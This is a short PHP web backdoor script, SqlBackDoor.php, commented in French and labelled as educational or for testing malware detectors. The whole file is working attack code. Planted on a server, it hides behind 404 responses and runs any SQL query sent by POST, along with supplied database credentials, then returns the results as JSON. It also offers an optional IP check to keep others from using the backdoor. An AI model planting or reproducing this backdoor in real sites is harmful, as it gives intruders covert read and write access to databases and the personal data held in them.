SqlBackDoor.php

<?php
// Fourni à des fins éducatives uniquement
// Ce code peut être obscurci pour tester les logiciels de détection de codes malveillants

// optionnel (vous permet de protéger votre porte dérobée, mais donne des informations sur la personne qui l'a mise en place)
// Récupération de l'adresse IP de l'envoyeur de la requête POST
// Et vérifie qu'elle est autorisé a utilisé la backdoor
/*
$ip = $_SERVER['REMOTE_ADDR'];
$ipCheck = '0.0.0.0';
if ($ip == $ipCheck){
    // Si l'adresse IP est incorrecte, renvoie une erreur 404.
    http_response_code(404);
    exit;
}
*/

// Vérification si les paramètres sont renseignés
if (!isset($_POST['sql']) || !isset($_POST['host']) || !isset($_POST['bdname']) || !isset($_POST['user']) || !isset($_POST['password'])) {
    // Si tous les paramètres ne sont pas renseignés, renvoie une erreur 404
    http_response_code(404);
    exit;
}

// Récupération des paramètres de la requête POST
$sql =  $_POST['sql'];
$host = $_POST['host'];
$bdname = $_POST['bdname'];
$user = $_POST['user'];
$password = $_POST['password'];

try {
    // Connexion à la base de données MySQL
    $pdo = new PDO("mysql:dbname=$bdname;host=$host", "$user", "$password");
    // Préparation de la requête SQL
    $statement = $pdo->prepare($sql);
    // Exécution de la requête SQL
    $statement->execute();
    // Récupération des résultats de la requête SQL
    $results = $statement->fetchAll(PDO::FETCH_ASSOC);
    // Encodage des résultats au format JSON
    $json = json_encode($results);
    // Affichage des résultats au format JSON
    die($json);
} catch (PDOException $e) {
    // Si une erreur se produit lors de la connexion à la base de données ou lors de l'exécution de la requête SQL, renvoie l'erreur.
    die("Erreur : " . $e->getMessage());
}
?>